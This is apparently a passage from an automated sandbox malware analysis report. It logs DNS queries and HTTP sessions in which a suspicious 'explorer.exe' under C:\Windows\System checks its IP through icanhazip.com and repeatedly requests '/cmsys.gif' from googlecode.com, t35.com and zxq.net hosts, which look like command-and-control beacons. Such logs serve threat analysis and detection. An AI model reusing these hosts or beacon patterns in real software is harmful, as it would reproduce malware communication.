                                                                                  Aug 5, 2022 09:09:33.012772083 CEST53605068.8.8.8192.168.2.4
                                                                                  Aug 5, 2022 09:09:35.856082916 CEST6427753192.168.2.48.8.8.8
                                                                                  Aug 5, 2022 09:09:35.957488060 CEST53642778.8.8.8192.168.2.4
                                                                                  Aug 5, 2022 09:09:38.419701099 CEST5607653192.168.2.48.8.8.8
                                                                                  Aug 5, 2022 09:09:38.437709093 CEST53560768.8.8.8192.168.2.4
                                                                                  Aug 5, 2022 09:09:39.055088997 CEST6075853192.168.2.48.8.8.8
                                                                                  Aug 5, 2022 09:09:39.230453014 CEST53607588.8.8.8192.168.2.4
                                                                                  Aug 5, 2022 09:09:56.408037901 CEST5406953192.168.2.48.8.8.8
                                                                                  Aug 5, 2022 09:09:56.509676933 CEST53540698.8.8.8192.168.2.4
                                                                                  Aug 5, 2022 09:10:14.969732046 CEST5774753192.168.2.48.8.8.8
                                                                                  Aug 5, 2022 09:10:15.073512077 CEST53577478.8.8.8192.168.2.4
                                                                                  Aug 5, 2022 09:10:30.820203066 CEST5759453192.168.2.48.8.8.8
                                                                                  Aug 5, 2022 09:10:30.921627998 CEST53575948.8.8.8192.168.2.4
                                                                                  Aug 5, 2022 09:10:46.631505966 CEST6136153192.168.2.48.8.8.8
                                                                                  Aug 5, 2022 09:10:46.733151913 CEST53613618.8.8.8192.168.2.4
                                                                                  Aug 5, 2022 09:11:02.050827026 CEST5167953192.168.2.48.8.8.8
                                                                                  Aug 5, 2022 09:11:02.068605900 CEST53516798.8.8.8192.168.2.4

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                  Aug 5, 2022 09:09:14.589622021 CEST192.168.2.48.8.8.80xb175Standard query (0)64.89.4.0.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                                                  Aug 5, 2022 09:09:15.360501051 CEST192.168.2.48.8.8.80xe985Standard query (0)icanhazip.comA (IP address)IN (0x0001)
                                                                                  Aug 5, 2022 09:09:28.133136988 CEST192.168.2.48.8.8.80x3f9Standard query (0)vccmd01.googlecode.comA (IP address)IN (0x0001)
                                                                                  Aug 5, 2022 09:09:30.719669104 CEST192.168.2.48.8.8.80x8086Standard query (0)vccmd02.googlecode.comA (IP address)IN (0x0001)
                                                                                  Aug 5, 2022 09:09:32.984909058 CEST192.168.2.48.8.8.80xef1fStandard query (0)vccmd03.googlecode.comA (IP address)IN (0x0001)
                                                                                  Aug 5, 2022 09:09:35.856082916 CEST192.168.2.48.8.8.80x414aStandard query (0)vccmd01.t35.comA (IP address)IN (0x0001)
                                                                                  Aug 5, 2022 09:09:38.419701099 CEST192.168.2.48.8.8.80x2b93Standard query (0)vccmd01.zxq.netA (IP address)IN (0x0001)
                                                                                  Aug 5, 2022 09:09:39.055088997 CEST192.168.2.48.8.8.80x9b2aStandard query (0)zxq.netA (IP address)IN (0x0001)
                                                                                  Aug 5, 2022 09:09:56.408037901 CEST192.168.2.48.8.8.80xe6a2Standard query (0)vccmd01.t35.comA (IP address)IN (0x0001)
                                                                                  Aug 5, 2022 09:10:14.969732046 CEST192.168.2.48.8.8.80x8134Standard query (0)vccmd01.t35.comA (IP address)IN (0x0001)
                                                                                  Aug 5, 2022 09:10:30.820203066 CEST192.168.2.48.8.8.80x1b26Standard query (0)vccmd01.t35.comA (IP address)IN (0x0001)
                                                                                  Aug 5, 2022 09:10:46.631505966 CEST192.168.2.48.8.8.80xab51Standard query (0)vccmd01.t35.comA (IP address)IN (0x0001)
                                                                                  Aug 5, 2022 09:11:02.050827026 CEST192.168.2.48.8.8.80xadc3Standard query (0)vccmd01.t35.comA (IP address)IN (0x0001)

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                  Aug 5, 2022 09:09:14.607461929 CEST8.8.8.8192.168.2.40xb175Name error (3)64.89.4.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
                                                                                  Aug 5, 2022 09:09:15.381139994 CEST8.8.8.8192.168.2.40xe985No error (0)icanhazip.com104.18.114.97A (IP address)IN (0x0001)
                                                                                  Aug 5, 2022 09:09:15.381139994 CEST8.8.8.8192.168.2.40xe985No error (0)icanhazip.com104.18.115.97A (IP address)IN (0x0001)
                                                                                  Aug 5, 2022 09:09:28.170955896 CEST8.8.8.8192.168.2.40x3f9No error (0)vccmd01.googlecode.comgooglecode.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                                  Aug 5, 2022 09:09:28.170955896 CEST8.8.8.8192.168.2.40x3f9No error (0)googlecode.l.googleusercontent.com142.250.145.82A (IP address)IN (0x0001)
                                                                                  Aug 5, 2022 09:09:30.757955074 CEST8.8.8.8192.168.2.40x8086No error (0)vccmd02.googlecode.comgooglecode.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                                  Aug 5, 2022 09:09:30.757955074 CEST8.8.8.8192.168.2.40x8086No error (0)googlecode.l.googleusercontent.com142.250.145.82A (IP address)IN (0x0001)
                                                                                  Aug 5, 2022 09:09:33.012772083 CEST8.8.8.8192.168.2.40xef1fNo error (0)vccmd03.googlecode.comgooglecode.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                                  Aug 5, 2022 09:09:33.012772083 CEST8.8.8.8192.168.2.40xef1fNo error (0)googlecode.l.googleusercontent.com142.250.145.82A (IP address)IN (0x0001)
                                                                                  Aug 5, 2022 09:09:35.957488060 CEST8.8.8.8192.168.2.40x414aName error (3)vccmd01.t35.comnonenoneA (IP address)IN (0x0001)
                                                                                  Aug 5, 2022 09:09:38.437709093 CEST8.8.8.8192.168.2.40x2b93No error (0)vccmd01.zxq.net51.81.194.202A (IP address)IN (0x0001)
                                                                                  Aug 5, 2022 09:09:39.230453014 CEST8.8.8.8192.168.2.40x9b2aNo error (0)zxq.net51.81.194.202A (IP address)IN (0x0001)
                                                                                  Aug 5, 2022 09:09:56.509676933 CEST8.8.8.8192.168.2.40xe6a2Name error (3)vccmd01.t35.comnonenoneA (IP address)IN (0x0001)
                                                                                  Aug 5, 2022 09:10:15.073512077 CEST8.8.8.8192.168.2.40x8134Name error (3)vccmd01.t35.comnonenoneA (IP address)IN (0x0001)
                                                                                  Aug 5, 2022 09:10:30.921627998 CEST8.8.8.8192.168.2.40x1b26Name error (3)vccmd01.t35.comnonenoneA (IP address)IN (0x0001)
                                                                                  Aug 5, 2022 09:10:46.733151913 CEST8.8.8.8192.168.2.40xab51Name error (3)vccmd01.t35.comnonenoneA (IP address)IN (0x0001)
                                                                                  Aug 5, 2022 09:11:02.068605900 CEST8.8.8.8192.168.2.40xadc3Name error (3)vccmd01.t35.comnonenoneA (IP address)IN (0x0001)

                                                                                  HTTP Request Dependency Graph

                                                                                  • zxq.net
                                                                                  • icanhazip.com
                                                                                  • vccmd01.googlecode.com
                                                                                  • vccmd02.googlecode.com
                                                                                  • vccmd03.googlecode.com
                                                                                  • vccmd01.zxq.net

                                                                                  HTTP Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  0192.168.2.44976651.81.194.202443C:\Windows\System\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  1192.168.2.44976951.81.194.202443C:\Windows\System\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  10192.168.2.449762142.250.145.8280C:\Windows\System\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Aug 5, 2022 09:09:33.049024105 CEST1152OUTGET /files/cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd03.googlecode.com
                                                                                  Connection: Keep-Alive
                                                                                  Aug 5, 2022 09:09:33.076080084 CEST1153INHTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Referrer-Policy: no-referrer
                                                                                  Content-Length: 1576
                                                                                  Date: Fri, 05 Aug 2022 07:09:33 GMT
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                  Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                  Aug 5, 2022 09:09:33.076112986 CEST1154INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                  Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  11192.168.2.44976451.81.194.20280C:\Windows\System\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Aug 5, 2022 09:09:38.610742092 CEST1155OUTGET /cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd01.zxq.net
                                                                                  Connection: Keep-Alive
                                                                                  Aug 5, 2022 09:09:38.777231932 CEST1156INHTTP/1.1 301 Moved Permanently
                                                                                  Connection: Keep-Alive
                                                                                  Keep-Alive: timeout=5, max=100
                                                                                  content-type: text/html
                                                                                  content-length: 707
                                                                                  date: Fri, 05 Aug 2022 07:09:38 GMT
                                                                                  location: https://zxq.net/cmsys.gif
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                                                                  Aug 5, 2022 09:09:58.454772949 CEST1383OUTGET /cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd01.zxq.net
                                                                                  Connection: Keep-Alive
                                                                                  Aug 5, 2022 09:09:58.622678995 CEST1383INHTTP/1.1 301 Moved Permanently
                                                                                  Connection: Keep-Alive
                                                                                  Keep-Alive: timeout=5, max=100
                                                                                  content-type: text/html
                                                                                  content-length: 707
                                                                                  date: Fri, 05 Aug 2022 07:09:58 GMT
                                                                                  location: https://zxq.net/cmsys.gif
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                                                                  Aug 5, 2022 09:10:17.062716007 CEST1441OUTGET /cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd01.zxq.net
                                                                                  Connection: Keep-Alive
                                                                                  Aug 5, 2022 09:10:17.228876114 CEST1442INHTTP/1.1 301 Moved Permanently
                                                                                  Connection: Keep-Alive
                                                                                  Keep-Alive: timeout=5, max=100
                                                                                  content-type: text/html
                                                                                  content-length: 707
                                                                                  date: Fri, 05 Aug 2022 07:10:17 GMT
                                                                                  location: https://zxq.net/cmsys.gif
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
